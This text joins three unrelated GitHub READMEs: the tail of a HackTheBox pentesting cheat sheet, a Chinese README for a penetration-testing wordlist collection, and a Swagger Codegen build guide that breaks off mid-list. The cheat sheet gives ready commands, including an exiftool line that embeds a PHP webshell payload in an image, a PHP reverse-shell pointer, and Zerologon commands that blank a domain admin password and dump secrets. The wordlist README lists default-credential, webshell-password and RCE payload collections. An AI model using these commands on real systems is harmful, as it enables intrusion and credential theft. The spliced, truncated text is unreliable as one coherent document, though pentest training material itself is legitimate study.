Forwarding:** <br /> > Command to be executed on the attacker machine <br /> `ssh -L 127.0.0.1:<port to req>:<internal ip>:<internal port> <intermediate_user@host>` <br /> ssh -L 127.0.0.1:8080:10.10.10.11:80 cyberwr3nch@10.10.10.10 = Whatever request to made to the attacker machine's port 8080 will travel through 10.10.10.10 and reach 10.10.10.11:80 | #### Directory Enumeration | Tool | Use | Command Syntax | | ---- | --- | -------------- | | [DirSearch](https://github.com/cyberwr3nch/hackthebox/tree/master/tools/dirsearch) | Directory enumeration Tool | `python3 dirsearch.py -u <url> -e <extn>` | | [Gobuster](https://github.com/cyberwr3nch/hackthebox/tree/master/tools/gobuster) | Directory enumeration tool written in GO | `gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads>`| | [RustBuster](https://github.com/phra/rustbuster)| Direcotry Enumeration tool written in rust | `rustbuster dir -u <url> -w <wordlist> -e <extn>` | #### Post Exploitation | Tool | Use | Command Syntax | | ---- | --- | -------------- | | [LinEnum](https://github.com/cyberwr3nch/hackthebox/tree/master/tools/LinEnum) | Post Enumeration scripts that automates enumeration | `./LinEnum.sh` | | [LinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) | Post Enumeration Script | `./linpeas.sh` | | [WinPEASbat/WinPEASexe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) | Windows post enumeration script and exe | `.\winPEAS.bat` | #### Misc | Tool | Use | Command Syntax | | ---- | --- | -------------- | | [Exiftool](https://github.com/cyberwr3nch/hackthebox/tree/master/tools/ExifTool) | Inspects the meta data of the image, Injects php payload in the comment section for file upload vulns, which can be added double extension `file.php.ext` | `./exiftool -Comment='<?php system($_GET['cmd']); ?>' <image.ext>` | [Git Dumper](https://github.com/arthaud/git-dumper) | Dump the Github repo if found in website | `./git-dumper.py <website/.git> <output folder>` | | [lxd-alpine builder](https://github.com/saghul/lxd-alpine-builder) | When a victim machine is implemented with lxc the privesc is done with this | [`article here`](https://www.hackingarticles.in/lxd-privilege-escalation/) | | [Php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) | Php reverse shell, when an upload is possible change the IP and make req to obtain reverse shell | | | [ZerologonPOC](https://github.com/risksense/zerologon) | CVE-2020-1472 Exploit, sets the domain admin password as empty pass and dump the secrets. _PS: Latest Version of Impackets is required_ | `python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\$@machineip`| | [Gopherus](https://github.com/tarunkant/Gopherus) | SSRF with `gopher://` protocol | `gophreus --exploit phpmemcache` | #### SAY NO TO MSF ! ## Admired Bloggers <a name='blog'></a> These are the urls that has the writeups for active and retired machines - [snowscan's Blog](https://snowscan.io/) :star: - [xct's Blog](https://vulndev.io/) :star: - [My Blog](https://cyberwr3nch.github.io) :skull: (inactive for a period of time) - [nav1n](http://www.nav1n.com/) - [0xPrashanth](https://0xprashant.github.io/) - [BinaryBiceps](https://binarybiceps.com/) - [p0i5on8](https://p0i5on8.github.io/) - [lUc1f3r11's Blog](https://fdlucifer.github.io/) - [subham399](https://shubhkumar.in/tags/hackthebox/) - [Jacob Riggs](https://jacobriggs.io/blog/) - [elbee infoSec](https://elbee.xyz/writeups) - [Kali-education](https://kali-education.info/) - [roman.de](https://romanh.de/home) - [0xdf's Blog](https://0xdf.gitlab.io/) - [0xrick's Blog](https://0xrick.github.io/) - [SecJuice](https://www.secjuice.com/) - [Sector 035 OSINT](https://medium.com/@sector035) :star: #### nvm this Constantly updating from *MAY 3<sup>rd</sup> 2020* # Thanks for visiting A noob _cyberwr3nch🔧_ A member of **TCSC** Learn and Spread <3 ``` xoxo💙``` ### Support My contents <a href="https://www.buymeacoffee.com/cyberwr3nch" target="_blank"><img align="left" alt="Dhanesh Sivasamy's Twitter" width="120px" src="https://cdn.buymeacoffee.com/buttons/v2/default-blue.png"></a>
# Dictionary-Of-Pentesting ## 简介 收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。 收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。 涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。 该项目计划持续收集,也欢迎感兴趣的大佬一起来完善。可直接提交PR,也可以提建议到issue。 ## 更新记录 **2021.02.03** 1. 增加amass的子域名字典。 **2021.01.31** 1. 增加AllAboutBugBounty项目的文档 **2021.01.27** 1. 增加几个可能导致RCE的端口 **2021.01.24** 1. 增加两个github dork **2021.01.16** 1. 增加cve的一些路径 2. 一些已知错误配置的路径 3. 一些API端点或服务器信息的特殊路径 4. 以上3种的合集(去重后) **2021.01.13** 1. 增加callback参数字典 2. 增加常见报错信息字符串列表 3. 增加debug参数字典 4. 增加snmp密码字典 5. 增加weblogic常见用户名密码 6. 增加oracle用户名、密码字典 **2021.01.04** 1. 增加DefaultCreds-cheat-sheet **2021.01.03** 1. 增加crackstation下载地址(由于字典太大,给出下载链接)。 2. 增加rockyou字典。 3. 增加cain字典。 **2021.01.02** 1. 增加webshell密码字典 2. 增加7w和81万请求参数字典 3. 增加Lcoalhost地址字典 4. HTML标签列表 **2020.12.31** 1. 增加域账户弱密码字典(7000+) **2020.12.30** 1. 增加ntlm验证的路径 **2020.12.15** 1. 增加github dork的搜索脚本。 **2020.12.09** 1. 增加CEH web services的用户名和密码字典。 **2020.12.07** 1. 增加oracle路径列表 **2020.11.23** 1. 增加ctf字典。 2. 增加摄像rtsp默认路径和默认用户名和密码 **2020.11.14** 1. 增加1个ics 默认密码字典 2. 增加1个设备默认密码字典(3400余条) **2020.11.04** 1. 增加 Wordpress BruteForc List **2020.11.03** 1. 增加几个默认口令 **2020.10.15** 1. 增加一些payload **2020.09.30** 1. 增加常见可以RCE的端口 **2020.09.29** 1. bugbounty oneliner rce 2. 一些默认路径 3. top 100k 密码字典 4. top 5k 用户名字典 5. 一些代码审计正则表达式 **2020.09.27** 1. 增加cms识别指纹规则集,包含 fofa/Wappalyzer/WEBEYE/web中间件/开发语言 等众多指纹库内容 **2020.09.22** 1. 修改swagger字典,添加5条路径 **2020.09.21** 1. 增加3种类型密码字典,拼音、纯数字、键盘密码字典 2. 增加scada 默认密码,硬编码等列表 **2020.09.18** 1. 增加11k+用户名密码组合 **2020.09.17** 1. 增加action后缀 top 100 2. javascript 中on事件列表 3. URL 16进制fuzz **2020.09.15** 1. 增加XXE bruteforce wordlist 2. 增加sql备份文件名字典 3. 删除重复的spring boot内容 **2020.09.10** 1. 增加自己收集的webservices内容。包含webservices目录,文件名,拓展名。后续计划增加存在漏洞webservices路径内容 2. readme中增加更新历史 **2020.09.09** 1. 增加weblogic路径 2. 增加swagger路径 3. 增加graphql路径 4. 增加spring-boot路径 5. 去掉device/default_password_list.txt文件中的空行 **2020.09.08** 1. 更新jsFileDict.txt字典,增加4个js文件名 **2020.09.07** 1. 添加绕过ip限制的http请求投 2. 修改readme.md **2020.08.29** 1. 增加常见设备、安全产品默认口令 2. 增加一行命令的BugBounty tips 3. 增加两处参数字典 4. 增加bruteforce-lists的字典 5. Readme 文件增加来源。逐渐完善。 **2020.08.28** 1. 增加api路径 2. 增加js文件路径 3. 增加http请求参数 4. 增加http请求参数值 **2020.08.27** 1. 删除一些多余文件 2. 精简Files下的dict的层级 3. 增加DirBuster字典 4. 增加spring boot actuator字典 **2020.08.26** 首次提交 ## todo - [ ] 文件名字、目录风格统一整理 - [ ] 英文版本的readme - [x] 网站指纹识别特征收集 - [x] 其他待添加 ## 来源&致谢(排名不分先后。目前还不全,会陆续完善) 该项目内容均来源于网络或自己整理,感谢各位大佬们的共享精神和辛苦付出~ * [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/internetwache/CT_subdomains](https://github.com/internetwache/CT_subdomains) * [https://github.com/lijiejie/subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) * [https://github.com/shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/OfJAAH/KingOfBugBountyTips](https://github.com/OfJAAH/KingOfBugBountyTips) * [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * [https://github.com/TheKingOfDuck/fuzzDicts](https://github.com/TheKingOfDuck/fuzzDicts) * [https://github.com/NS-Sp4ce/Dict](https://github.com/NS-Sp4ce/Dict) * [https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun) * [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [https://github.com/YasserGersy/Enums/](https://github.com/YasserGersy/Enums/) * [https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf](https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf) * [https://twitter.com/DanielAzulay18/status/1304751830539395072](https://twitter.com/DanielAzulay18/status/1304751830539395072) * [https://github.com/cwkiller/Pentest_Dic](https://github.com/cwkiller/Pentest_Dic) * [https://github.com/huyuanzhi2/password_brute_dictionary](https://github.com/huyuanzhi2/password_brute_dictionary) * [https://github.com/Clear2020/icsmaster/](https://github.com/Clear2020/icsmaster/) * [https://github.com/LandGrey/SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) * [https://github.com/al0ne/Vxscan][https://github.com/al0ne/Vxscan] * [https://github.com/L0kiii/FofaScan](https://github.com/L0kiii/FofaScan) * [https://github.com/nw01f/CmsIdentification-masterV2](https://github.com/nw01f/CmsIdentification-masterV2) * [https://github.com/Lucifer1993/cmsprint](https://github.com/Lucifer1993/cmsprint) * [https://github.com/erwanlr/Fingerprinter](https://github.com/erwanlr/Fingerprinter) * [https://github.com/lewiswu1209/fingerprint](https://github.com/lewiswu1209/fingerprint) * [https://github.com/shelld3v/RCE-python-oneliner-payload](https://github.com/shelld3v/RCE-python-oneliner-payload) * [https://twitter.com/ptswarm/status/1311310897592315905](https://twitter.com/ptswarm/status/1311310897592315905) * [https://github.com/xer0days/BugBounty](https://github.com/xer0days/BugBounty) * [https://twitter.com/ptswarm/status/1323266632920256512](https://twitter.com/ptswarm/status/1323266632920256512) * [https://github.com/kongsec/Wordpress-BruteForce-List/](https://github.com/kongsec/Wordpress-BruteForce-List/) * [https://github.com/nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) * [https://github.com/arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) * [https://github.com/pwnfoo/NTLMRecon](https://github.com/pwnfoo/NTLMRecon) * [https://github.com/chroblert/domainWeakPasswdCheck](https://github.com/chroblert/domainWeakPasswdCheck/) * [https://github.com/gh0stkey/Web-Fuzzing-Box](https://github.com/gh0stkey/Web-Fuzzing-Box) * [https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [https://github.com/ihebski/DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [https://github.com/epony4c/Exploit-Dictionary](https://github.com/epony4c/Exploit-Dictionary) * [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths) * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) * [https://github.com/daffainfo/AllAboutBugBounty](https://github.com/daffainfo/AllAboutBugBounty) * [https://github.com/OWASP/Amass](https://github.com/OWASP/Amass)
# Swagger Code Generator [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea) [![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project) [![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen) :star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star: :notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover: :warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning: :rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket: ## Overview This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported: - **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node) - **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra) - **API documentation generators**: **HTML**, **Confluence Wiki** - **Others**: **JMeter** Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project. # Table of contents - [Swagger Code Generator](#swagger-code-generator) - [Overview](#overview) - [Table of Contents](#table-of-contents) - Installation - [Compatibility](#compatibility) - [Prerequisites](#prerequisites) - [OS X Users](#os-x-users) - [Building](#building) - [Docker](#docker) - [Build and run](#build-and-run-using-docker) - [Run docker in Vagrant](#run-docker-in-vagrant) - [Public Docker image](#public-docker-image) - [Homebrew](#homebrew) - [Getting Started](#getting-started) - Generators - [To generate a sample client library](#to-generate-a-sample-client-library) - [Generating libraries from your server](#generating-libraries-from-your-server) - [Modifying the client library format](#modifying-the-client-library-format) - [Making your own codegen modules](#making-your-own-codegen-modules) - [Where is Javascript???](#where-is-javascript) - [Generating a client from local files](#generating-a-client-from-local-files) - [Customizing the generator](#customizing-the-generator) - [Validating your OpenAPI Spec](#validating-your-openapi-spec) - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation) - [Generating static html api documentation](#generating-static-html-api-documentation) - [To build a server stub](#to-build-a-server-stub) - [To build the codegen library](#to-build-the-codegen-library) - [Workflow Integration](#workflow-integration) - [Github Integration](#github-integration) - [Online Generators](#online-generators) - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution) - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen) - [Swagger Codegen Core Team](#swagger-codegen-core-team) - [Swagger Codegen Evangelist](#swagger-codegen-evangelist) - [License](#license) ## Compatibility The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification: Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes -------------------------- | ------------ | -------------------------- | ----- 2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes 2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes 2.2.2 (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2) 2.2.1 | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1) 2.1.6 | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6) 2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17) 1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1) ### Prerequisites If you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum): ``` wget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar java -jar swagger-codegen-cli.jar help ``` On a mac, it's even easier with `brew`: ``` brew install swagger-codegen ``` To build from source, you need the following installed and available in your $PATH: * [Java 7 or 8](http://java.oracle.com) * [Apache maven 3.3.3 or greater](http://maven.apache.org/) #### OS X Users Don't forget to install Java 7 or 8. You probably have 1.6. Export JAVA_HOME in order to use the supported Java version: ``` export JAVA_HOME=`/usr/libexec/java_home -v 1.8` export PATH=${JAVA_HOME}/bin:$PATH ``` ### Building After cloning the project, you can build it from source with this command: ``` mvn clean package ``` ### Homebrew To install, run `brew install swagger-codegen` Here is an example usage: ``` swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/ ``` ### Docker #### Development in docker You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen` in the docker container. It also maps `~/.m2/repository` to the appropriate container location. To execute `mvn package`: ``` git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen ./run-in-docker.sh mvn package ``` Build artifacts are now accessible in your working directory. Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example: ``` ./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli ./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli ./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client ./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \ -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore ``` #### Run Docker in Vagrant Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads). ``` git clone http://github.com/swagger-api/swagger-codegen.git cd swagger-codegen vagrant up vagrant ssh cd /vagrant ./run-in-docker.sh mvn package ``` #### Public Pre-built Docker images - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service) - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI) ##### Swagger Generator Docker Image The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code. Example usage (note this assumes `jq` is installed for command line processing of JSON): ``` # Start container and save the container id CID=$(docker run -d swaggerapi/swagger-generator) # allow for startup sleep 5 # Get the IP of the running container GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID) # Execute an HTTP request and store the download link RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" }' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"') # Download the generated zip and redirect to a file curl $RESULT > result.zip # Shutdown the swagger generator image docker stop $CID && docker rm $CID ``` In the example above, `result.zip` will contain the generated client. ##### Swagger Codegen CLI Docker Image The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version. To generate code with this image, you'll need to mount a local location as a volume. Example: ``` docker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l go \ -o /local/out/go ``` The generated code will be located under `./out/go` in the current directory. ## Getting Started To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following ```sh git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen mvn clean package java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l php \ -o /var/tmp/php_api_client ``` (if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`) You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar) To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate` To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php` ## Generators ### To generate a sample client library You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows: ``` ./bin/java-petstore.sh ``` (On Windows, run `.\bin\windows\java-petstore.bat` instead) This will run the generator with this command: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java ``` with a number of options. You can get the options with the `help generate` command: ``` NAME swagger-codegen-cli generate - Generate code with chosen lang SYNOPSIS swagger-codegen-cli generate [(-a <authorization> | --auth <authorization>)] [--additional-properties <additional properties>] [--api-package <api package>] [--artifact-id <artifact id>] [--artifact-version <artifact version>] [(-c <configuration file> | --config <configuration file>)] [-D <system properties>] [--group-id <group id>] (-i <spec file> | --input-spec <spec file>) [--import-mappings <import mappings>] [--instantiation-types <instantiation types>] [--invoker-package <invoker package>] (-l <language> | --lang <language>) [--language-specific-primitives <language specific primitives>] [--library <library>] [--model-package <model package>] [(-o <output directory> | --output <output directory>)] [(-s | --skip-overwrite)] [(-t <template directory> | --template-dir <template directory>)] [--type-mappings <type mappings>] [(-v | --verbose)] OPTIONS -a <authorization>, --auth <authorization> adds authorization headers when fetching the swagger definitions remotely. Pass in a URL-encoded string of name:header with a comma separating multiple values --additional-properties <additional properties> sets additional properties that can be referenced by the mustache templates in the format of name=value,name=value --api-package <api package> package for generated api classes --artifact-id <artifact id> artifactId in generated pom.xml --artifact-version <artifact version> artifact version in generated pom.xml -c <configuration file>, --config <configuration file> Path to json configuration file. File content should be in a json format {"optionKey":"optionValue", "optionKey1":"optionValue1"...} Supported options can be different for each language. Run config-help -l {lang} command for language specific config options. -D <system properties> sets specified system properties in the format of name=value,name=value --group-id <group id> groupId in generated pom.xml -i <spec file>, --input-spec <spec file> location of the swagger spec, as URL or file (required) --import-mappings <import mappings> specifies mappings between a given class and the import that should be used for that class in the format of type=import,type=import --instantiation-types <instantiation types> sets instantiation type mappings in the format of type=instantiatedType,type=instantiatedType.For example (in Java): array=ArrayList,map=HashMap. In other words array types will get instantiated as ArrayList in generated code. --invoker-package <invoker package> root package for generated code -l <language>, --lang <language> client language to generate (maybe class name in classpath, required) --language-specific-primitives <language specific primitives> specifies additional language specific primitive types in the format of type1,type2,type3,type3. For example: String,boolean,Boolean,Double --library <library> library template (sub-template) --model-package <model package> package for generated models -o <output directory>, --output <output directory> where to write the generated files (current dir by default) -s, --skip-overwrite specifies if the existing files should be overwritten during the generation. -t <template directory>, --template-dir <template directory> folder containing the template files --type-mappings <type mappings> sets mappings between swagger spec types and generated code types in the format of swaggerType=generatedType,swaggerType=generatedType. For example: array=List,map=Map,string=String --reserved-words-mappings <import mappings> specifies how a reserved name should be escaped to. Otherwise, the default _<name> is used. For example id=identifier -v, --verbose verbose mode ``` You can then compile and run the client, as well as unit tests against it: ``` cd samples/client/petstore/java mvn package ``` Other languages have petstore samples, too: ``` ./bin/android-petstore.sh ./bin/java-petstore.sh ./bin/objc-petstore.sh ``` ### Generating libraries from your server It's just as easy--just use the `-i` flag to point to either a server or file. ### Modifying the client library format Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own. You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy. ### Making your own codegen modules If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \ -o output/myLibrary -n myClientCodegen -p com.my.company.codegen ``` This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic. You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` For Windows users, you will need to use `;` instead of `:` in the classpath, e.g. ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \ io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\ -i http://petstore.swagger.io/v2/swagger.json \ -o myClient ``` ### Where is Javascript??? See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require static code generation. There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification. :exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala. ### Generating a client from local files If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument to the code generator like this: ``` -i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json ``` Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane. ### Selective generation You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output: The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated: ``` # generate only models java -Dmodels {opts} # generate only apis java -Dapis {opts} # generate only supporting files java -DsupportingFiles # generate models and supporting files java -Dmodels -DsupportingFiles ``` To control the specific files being generated, you can pass a CSV list of what you want: ``` # generate the User and Pet models only -Dmodels=User,Pet # generate the User model and the supportingFile `StringUtil.java`: -Dmodels=User -DsupportingFiles=StringUtil.java ``` To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`. These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`): ``` # generate only models (with tests and documentation) java -Dmodels {opts} # generate only models (with tests but no documentation) java -Dmodels -DmodelDocs=false {opts} # generate only User and Pet models (no tests and no documentation) java -Dmodels=User,Pet -DmodelTests=false {opts} # generate only apis (without tests) java -Dapis -DapiTests=false {opts} # generate only apis (modelTests option is ignored) java -Dapis -DmodelTests=false {opts} ``` When using selective generation, _only_ the templates needed for the specific generation will be used. ### Ignore file format Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with. The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code. Examples: ``` # Swagger Codegen Ignore # Lines beginning with a # are comments # This should match build.sh located anywhere. build.sh # Matches build.sh in the root /build.sh # Exclude all recursively docs/** # Explicitly allow files excluded by other rules !docs/UserApi.md # Recursively exclude directories named Api # You can't negate files below this directory. src/**/Api/ # When this file is nested under /Api (excluded above), # this rule is ignored because parent directory is excluded by previous rule. !src/**/PetApiTests.cs # Exclude a single, nested file explicitly src/IO.Swagger.Test/Model/AnimalFarmTests.cs ``` The `.swagger-codegen-ignore` file must exist in the root of the output directory. ### Customizing the generator There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc: ``` $ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/ AbstractJavaJAXRSServerCodegen.java AbstractTypeScriptClientCodegen.java AkkaScalaClientCodegen.java AndroidClientCodegen.java AspNet5ServerCodegen.java AspNetCoreServerCodegen.java AsyncScalaClientCodegen.java BashClientCodegen.java CSharpClientCodegen.java ClojureClientCodegen.java CsharpDotNet2ClientCodegen.java DartClientCodegen.java FlashClientCodegen.java FlaskConnexionCodegen.java GoClientCodegen.java HaskellServantCodegen.java JMeterCodegen.java JavaCXFServerCodegen.java 